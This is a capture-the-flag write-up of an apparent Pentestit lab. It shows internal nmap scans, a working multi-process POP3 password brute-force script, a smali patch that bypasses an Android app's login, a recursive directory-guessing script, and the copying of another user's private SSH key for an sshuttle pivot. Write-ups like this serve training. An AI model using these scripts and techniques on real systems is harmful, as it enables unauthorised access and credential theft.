[email protected]:/tmp/.test$ nmap -A -sV -Pn -p- -n -oA ssh-test 172.16.0.1

Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-07 18:33 MSK
Nmap scan report for 172.16.0.1
Host is up (0.00098s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
38088/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|_2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds

So the box is changing its listening port. Or more specifically, if you notice the port by doing consecutive nmaps, the port changes every some seconds. There is enough time to try for a connection. However, the private key I got doesn't seem to be working.

[email protected]:~/Documents/pentestit# ssh -i keys [email protected] -p14277
Permission denied (publickey).

Oh well, let's leave this host for now, and I'll come back to it once I've got some more keys. At this point I take a step back to see where I stand.

While thinking about the next course of action, I remember I have a big list of emails that I still haven't actually used other than bruteforcing 3 of them.

However, things are different now, I have a foothold on the network, and I can practically try to bruteforce some mails accounts without actually going over the internet, using the lan speed between the boxes and do it much faster without worrying about it.

First, I nmap the "mail" box from within the network.

[email protected]:~$ nmap -A -sV -T4 -p- -Pn -n 172.16.0.7

Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-09 14:11 MSK
Nmap scan report for 172.16.0.7
Host is up (0.00069s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE                VERSION
22/tcp    open  ssh                    OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 1024 cc:70:0e:29:56:10:5b:84:c0:fb:7a:6b:f1:2b:bc:c9 (DSA)
|_2048 cb:c1:5a:0c:a2:72:16:af:3d:40:f3:e6:26:be:22:0a (RSA)
25/tcp    open  smtp                   CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
106/tcp   open  pop3pw?
110/tcp   open  tcpwrapped
|_pop3-capabilities: USER IMPLEMENTATION(CommuniGatePro) UIDL APOP TOP OK(K capability list follows) STLS PIPELINING LAST SASL(LOGIN PLAIN CRAM-MD5 DIGEST-MD5 GSSAPI MSN NTLM)
111/tcp   open  rpcbind (rpcbind V2-4) 2-4 (rpc #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          35159/tcp  status
|_  100024  1          39861/udp  status
143/tcp   open  imap
|_imap-capabilities: LOGIN-REFERRALS AUTH=GSSAPI QUOTA UNSELECT AUTH=NTLMA0001 LISTEXT AUTH=LOGIN ID completed AUTH=DIGEST-MD5 CHILDREN BINARY OK IMAP4REV1 IMAP4 AUTH=CRAM-MD5 AUTH=MSN AUTH=PLAIN STARTTLS ACL SASL-IR ESEARCH UIDPLUS LITERAL+ IDLE NAMESPACE MULTIAPPEND
389/tcp   open  ldap                   (Anonymous bind OK)
636/tcp   open  ssl/ldap               (Anonymous bind OK)
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
674/tcp   open  acap                   CommuniGate Pro ACAP server 6.0.9 (for mail client preference sharing)
993/tcp   open  ssl/imap
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
|_imap-capabilities: LOGIN-REFERRALS AUTH=GSSAPI QUOTA UNSELECT AUTH=NTLMA0001 LISTEXT AUTH=LOGIN ID AUTH=DIGEST-MD5 CHILDREN BINARY completed IMAP4REV1 IMAP4 OK AUTH=MSN AUTH=CRAM-MD5 AUTH=PLAIN ACL SASL-IR ESEARCH UIDPLUS LITERAL+ IDLE NAMESPACE MULTIAPPEND
3478/tcp  open  unknown
5060/tcp  open  sip-proxy              CommuniGatePro VoIP Gateway 6.0.9
5061/tcp  open  ssl/sip-tls?
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
5222/tcp  open  xmpp-client?
5223/tcp  open  ssl/hpvirtgrp?
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
5269/tcp  open  xmpp-server?
5349/tcp  open  ssl/unknown
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
8010/tcp  open  http                   CommuniGate Pro httpd 6.0.9
8021/tcp  open  ftp
8100/tcp  open  http                   CommuniGate Pro httpd 6.0.9
| http-methods: Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title:  CommuniGate Pro gds.lab Entrance
9010/tcp  open  ssl/http               CommuniGate Pro httpd 6.0.9
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
9100/tcp  open  jetdirect?
11024/tcp open  unknown
35159/tcp open  status (status V1)     1 (rpc #100024)
6 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port106-TCP:V=6.00%I=7%D=2/9%Time=589C4E6E%P=x86_64-unknown-linux-gnu%r
SF:(NULL,4B,"200\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.
SF:0\.9\x20ready\x20<4 gds="" lab="">\r\n")%r(GenericLines,89,"200\
SF:x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0\.9\x20ready\
SF:x20<4 gds="" lab="">\r\n500\x20Invalid\x20command;\x20use\x20HEL
SF:P\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(GetRequest,89,"2
SF:00\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0\.9\x20rea
SF:dy\x20<5 gds="" lab="">\r\n500\x20Invalid\x20command;\x20use\x20
SF:HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(HTTPOptions,8
SF:9,"200\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0\.9\x2
SF:0ready\x20<6 gds="" lab="">\r\n500\x20Invalid\x20command;\x20use
SF:\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(RTSPReque
SF:st,89,"200\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0\.
SF:9\x20ready\x20<7 gds="" lab="">\r\n500\x20Invalid\x20command;\x2
SF:0use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(RPCCh
SF:eck,40C,"200\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0
SF:\.9\x20ready\x20<8 gds="" lab="">\r\n500\x20Invalid\x20command;\
SF:x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20I
SF:nvalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\
SF:x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\
SF:x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP
SF:\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20comm
SF:and;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500
SF:\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x2
SF:0use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Inv
SF:alid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x2
SF:0HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x2
SF:0command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r
SF:\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20comman
SF:d;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x
SF:20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20u
SF:se\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Inval
SF:id\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20H
SF:ELP\r\n500\x20Invalid\x20command");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port143-TCP:V=6.00%I=7%D=2/9%Time=589C4E6E%P=x86_64-unknown-linux-gnu%r
SF:(NULL,36,"\*\x20OK\x20gds\.lab\x20CommuniGate\x20Pro\x20IMAP\x20Server\
SF:x206\.0\.9\x20ready\r\n")%r(GetRequest,63,"\*\x20OK\x20gds\.lab\x20Comm
SF:uniGate\x20Pro\x20IMAP\x20Server\x206\.0\.9\x20ready\r\nGET\x20BAD\x20n
SF:ot\x20logged\x20in\r\n\x20BAD\x20bad\x20command\x20tag\r\n")%r(GenericL
SF:ines,62,"\*\x20OK\x20gds\.lab\x20CommuniGate\x20Pro\x20IMAP\x20Server\x
SF:206\.0\.9\x20ready\r\n\x20BAD\x20bad\x20command\x20tag\r\n\x20BAD\x20ba
SF:d\x20command\x20tag\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port993-TCP:V=6.00%T=SSL%I=7%D=2/9%Time=589C4E74%P=x86_64-unknown-linux
SF:-gnu%r(NULL,36,"\*\x20OK\x20gds\.lab\x20CommuniGate\x20Pro\x20IMAP\x20S
SF:erver\x206\.0\.9\x20ready\r\n")%r(GenericLines,62,"\*\x20OK\x20gds\.lab
SF:\x20CommuniGate\x20Pro\x20IMAP\x20Server\x206\.0\.9\x20ready\r\n\x20BAD
SF:\x20bad\x20command\x20tag\r\n\x20BAD\x20bad\x20command\x20tag\r\n")%r(G
SF:etRequest,63,"\*\x20OK\x20gds\.lab\x20CommuniGate\x20Pro\x20IMAP\x20Ser
SF:ver\x206\.0\.9\x20ready\r\nGET\x20BAD\x20not\x20logged\x20in\r\n\x20BAD
SF:\x20bad\x20command\x20tag\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5061-TCP:V=6.00%T=SSL%I=7%D=2/9%Time=589C4E88%P=x86_64-unknown-linu
SF:x-gnu%r(GenericLines,2,"\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8021-TCP:V=6.00%I=7%D=2/9%Time=589C4E6E%P=x86_64-unknown-linux-gnu%
SF:r(NULL,34,"220\x20gds\.lab\x20CommuniGate\x20Pro\x20FTP\x20Server\x206\
SF:.0\.9\x20ready\r\n")%r(GenericLines,72,"220\x20gds\.lab\x20CommuniGate\
SF:x20Pro\x20FTP\x20Server\x206\.0\.9\x20ready\r\n500\x20Invalid\x20comman
SF:d;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(
SF:Help,F9,"220\x20gds\.lab\x20CommuniGate\x20Pro\x20FTP\x20Server\x206\.0
SF:\.9\x20ready\r\n214-Commands\x20Supported:\r\n\x20AUTH\x20\x20HELP\x20\
SF:x20PASS\x20\x20STLS\x20\x20QUIT\x20\x20USER\r\n\x20Copyright\x20\(c\)\x
SF:201998-2013,\x20Stalker\x20Software,\x20Inc\.\r\n214-gds\.lab\x20\x20_t
SF:rial_\r\n214\x20To\x20report\x20problems\x20send\x20mail\x20to\x20\r\n")%r(SMBProgNeg,452,"220\x20gds\.lab\x20Commun
SF:iGate\x20Pro\x20FTP\x20Server\x206\.0\.9\x20ready\r\n500\x20Invalid\x20
SF:command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\
SF:n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command
SF:;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x2
SF:0Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20us
SF:e\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invali
SF:d\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HE
SF:LP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20co
SF:mmand;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n5
SF:00\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\
SF:x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20I
SF:nvalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\
SF:x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\
SF:x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP
SF:\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20comm
SF:and;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500
SF:\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x2
SF:0use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Inv
SF:alid");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port11024-TCP:V=6.00%I=7%D=2/9%Time=589C4E83%P=x86_64-unknown-linux-gnu
SF:%r(RPCCheck,35,"\0")%r(DNSVersionBindReq,35,"\0")%r(DNSStatusRequest,35,"\0")%r(
SF:SSLSessionReq,35,"\0")%r(Kerberos,35,"\0")%r(SMBProgNeg,35,"\0")%r(X11Probe,35,"
SF:\0"
SF:)%r(LDAPBindReq,35,"\0")%r(LANDesk-RC,35,"\0")%r(TerminalServer,35,"\0")%r(NCP,3
SF:5,"
SF:\0")%r(NotesRPC,35,"\0")%r(WMSRequest,35,"\0")%r(oracle-tns,35,"\0")%r(afp,35,"<
SF:error\x20errorText=\"XML\x20syntax\x20error\"\x20errorNum=\"500\"/>\0");
Service Info: Host: gds.lab

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.35 seconds

One hell of an output. And mail ports are open. So I'm good to go.

Now, I need to do the bruteforcing locally from the box I'm already in, using a script, so all I have to do is upload a password-list, a list with the users, and well, write the script itself.

For the passlist I will use rockyou-50.txt wich is contained in SecLists and contains these passwords from the original rockyou with a 50% chance of success. The user list is the following


And finally, the script.

import poplib
from multiprocessing import Pool
import logging

global credentials
credentials = []
global found
found = []
logger = logging.getLogger('test')
hdlr = logging.FileHandler('log.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.DEBUG)

def Mailer(a):
 result = ''
 if a.split(':')[0] in found:
  pass
 else:
  try:
   Mailer = poplib.POP3('172.16.0.7')
   Mailer.user(a.split(':')[0])
   result = Mailer.pass_(a.split(':')[1])
  except:
   pass
  logger.info('Run: ' + a)
  if 'OK' in result:
   print a
   found.append(a.split(':')[0])

if __name__ == '__main__':
 pool = Pool(processes=50)
 with open('users.txt') as users:
  for user in users:
   credentials = []
   with open('rockyou-50.txt') as passwords:
    for password in passwords:
     credentials.append(user.strip()+":"+password.strip())
     logger.info('Appended: ' + user.strip()+":"+password.strip())
   pool.map(Mailer, credentials)

The script is using 50 concurrent threads to connect to the pop server and try different credentials. It also writes a log file in order to track the progress since it's kind of a long process. Aaand let's go for it.

[email protected]:/tmp/.test$ ls -l
total 32200
-rw-r--r-- 1 e.lindsey e.lindsey     1284 Feb  9 13:35 brute.py
-rw-r--r-- 1 e.lindsey e.lindsey 32879986 Feb  9 14:21 log.log
-rw-r--r-- 1 e.lindsey e.lindsey    75912 Feb  9 12:04 rockyou-50.txt
-rw-r--r-- 1 e.lindsey e.lindsey      643 Feb  9 14:02 users.txt
[email protected]:/tmp/.test$ python brute.py 
[email protected]:justdoit

There it is! [email protected] with password justdoit. Heading over to the web ui to check it out.

After logging in, a.modlin has 2 mails from j.wise.


The mail with Token subject:


Another token for my collection, this time for the "mail" box. Moving on with the other mail with subject Apps.


Very interesting. From what I know already, this must be about the "ssh-test" box I was looking at earlier. Grabbing a copy of that locally.

Starting up and Android Virtual Device and installing the apk through adb to see what I'm dealing with, proxying the application through Burp in case it tries to send anything out.

C:\Users\gknsb>C:\Users\gknsb\AppData\Local\Android\sdk\tools\emulator.exe -avd Test -http-proxy 127.0.0.1:8080
Hax is enabled
Hax ram_size 0x80000000
HAX is working and emulator runs in fast virt mode.
emulator: Listening for console connections on port: 5554
emulator: Serial number of this emulator (for ADB): emulator-5554

C:\Users\gknsb>adb install Documents\pentestit\gds-authenticator.apk
[100%] /data/local/tmp/gds-authenticator.apk
        pkg: /data/local/tmp/gds-authenticator.apk
Success


Any credentials I try, even the previous ones that I found, result in the same message. So I'm not able to log in normally. Although I no requests are being made since I'm watching Burp too. Let's take a look under the hood of the application.

I unzip the application as if it was a zip file and use dex2jar to convert the .dex to .jar for better inspection.

C:\Users\gknsb\Documents\pentestit\gds-authenticator-zip>C:\Users\gknsb\Documents\Tools\dex2jar-2.0\d2j-dex2jar.bat classes.dex
dex2jar classes.dex -> .\classes-dex2jar.jar

Then, I open the jar with jd-gui to browse through the code. Browsing through the code, and following the logic behind the application I notice the following.


From the looks of it, no matter what I input, the application returns false during the authentication process, and the doInBackground fucntion is responsible from that output. So, I'm thinking about changing this "false" to "true" and that should bypass the authentication no matter what credentials I use.

With apktool I decompile the app, extracting the smali files.

C:\Users\gknsb\Documents\pentestit>apktool.bat d gds-authenticator.apk
I: Using Apktool 2.2.1 on gds-authenticator.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: C:\Users\echat\AppData\Local\apktool\framework\1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

Then, browsing through the decompiled code, the file that has to be edited is "LoginActivity$UserLoginTask.smali" and the lines that have to be changed are the following.

# virtual methods
.method protected varargs doInBackground([Ljava/lang/Void;)Ljava/lang/Boolean;
    .locals 5
    .param p1, "params"    # [Ljava/lang/Void;

    .prologue
    const/4 v4, 0x0

    .line 315
    const-wide/16 v2, 0x3e8

    :try_start_0
    invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V

    .line 316
    const/4 v1, 0x0

Changed into:

# virtual methods
.method protected varargs doInBackground([Ljava/lang/Void;)Ljava/lang/Boolean;
    .locals 5
    .param p1, "params"    # [Ljava/lang/Void;

    .prologue
    const/4 v4, 0x1

    .line 315
    const-wide/16 v2, 0x3e8

    :try_start_0
    invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V

    .line 316
    const/4 v1, 0x1

As seen from above, I am actually editing the decompiled code of the doInBackground function of the app, changing v4 and v1 variables from 0x0 (false) to 0x1 (true).

Recompiling the app, signing it, and then reinstalling it to the AVD.

C:\Users\gknsb\Documents\pentestit>apktool.bat b gds-authenticator
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...

C:\Users\gknsb\Documents\pentestit>..\Tools\dex2jar-2.0\d2j-apk-sign.bat -f -o gds-authenticator-signed.apk gds-authenticator\dist\gds-authenticator.apk
C:\Users\gknsb\Documents\pentestit>cd gds-authenticator

C:\Users\gknsb\Documents\pentestit\gds-authenticator>cd dist
C:\Users\gknsb\Documents\pentestit\gds-authenticator\dist>adb install gds-authenticator-signed.apk
[100%] /data/local/tmp/gds-authenticator-signed.apk
        pkg: /data/local/tmp/gds-authenticator-signed.apk
Success

Aaaand finally, launch the app and try any credentials, that should bypass the login form and appear as a valid login.


That's it, login bypassed, and now according to the mail I can see the port that the ssh server of box "ssh-test" is listening at, at any given time. However I only have one key at this time, the one I found in rross's directory and that doesn't seem to work. I take a minute to go back and revisit those results and I notice the following.

[email protected]:/tmp/.test$ ls -l /data/users/a.modlin/docs
ls: cannot open directory /data/users/a.modlin/docs: Permission denied
[email protected]:/tmp/.test$ ls -l /data/users/rross/docs
total 8
-rw----r-- 1 root root 1675 Nov 25 15:17 keys
-rw-r--r-- 1 root root    9 Nov 25 15:43 token.txt

I had found the key for rross in docs, but for other users docs was still receiving the "Permission denied". That means that my previous bruteforcing might not have been enough since I was looking only for directories with depth 1. I decide to change that bruteforcing script to be recursive.

import os
from string import ascii_lowercase
from itertools import product

def findSubDir(baseDir):
 for X in range(1, 5, 1):
  keywords = [''.join(i) for i in product(ascii_lowercase, repeat = X)]
  for word in keywords:
   if os.path.exists(os.path.join(baseDir, word)):
    print os.path.join(baseDir, word)
    findSubDir(os.path.join(baseDir, word))

if __name__ == "__main__":
 users = ['a.modlin', 'e.lindsey', 'g.leone', 'k.barth', 'm.howard', 'rross', 's.locklear']
 for user in users:
  findSubDir(os.path.join('/data/users', user))

Now running this new one...

[email protected]:/tmp/.test$ python dirfinder.py 
/data/users/a.modlin/tmp
/data/users/a.modlin/docs
/data/users/a.modlin/docs/key
/data/users/rross/tmp
/data/users/rross/docs
/data/users/rross/docs/keys
/data/users/s.locklear/tmp
/data/users/s.locklear/docs

Now that's interesting, a "key" appeared inside a.modlin's docs folder. Plus from the mail that he received, he is the one supposed to connect to "test-ssh" using his app for the random port that I already have. Let's see if this will work. First, I grab a local copy of the key and set the proper permissions. Then, I'll use sshuttle to create a tunnel inside that network through the ssh I already have.

[email protected]:~/Documents/pentestit# scp [email protected]:/data/users/a.modlin/docs/key ./
[email protected]'s password: 
key                                                   100% 1675    17.5KB/s   00:00
[email protected]:~/Documents/pentestit# chmod 0400 key
[email protected]:~# sshuttle -r [email protected] 172.16.0.0/24
[email protected]'s password: 
client: Connected.

With shuttle in place and the key localy, I just try to connect to ssh-test internal address (172.16.0.1) as a.modlin, with his key, and on the port I get from the mobile app.

[email protected]:~/Documents/pentestit# ssh -i key [email protected] -p 9706
Linux tl10-test-ssh 3.2.0-4-amd64 #1 SMP Debian 3.2.81-2 x86_64
Last login: Fri Feb 24 18:18:10 2017 from 172.16.0.8
[email protected]:~$ ls -la
total 32
drwxr-x--- 3 root a.modlin 4096 Nov 25 21:17 .
drwxr-xr-x 3 root root     4096 Nov 25 20:40 ..
-rw-r----- 1 root a.modlin  257 Nov 25 20:43 .bash_history
-rw-r----- 1 root a.modlin  220 Nov 25 20:40 .bash_logout
-rw-r----- 1 root a.modlin 3392 Nov 25 20:40 .bashrc
-rw-r----- 1 root a.modlin  675 Nov 25 20:40 .profile
drwxr-x--- 2 root a.modlin 4096 Nov 25 20:41 .ssh
-rw-r--r-- 1 root root        9 Nov 25 21:17 token.txt
[email protected]:~$ cat token.txt 
EN9ahVeW

Aaand another token! At this point due to my lack of time, I didn't finish the lab before they switched to a newer one sooo bad luck, this writeup has to stay here. :/

Comments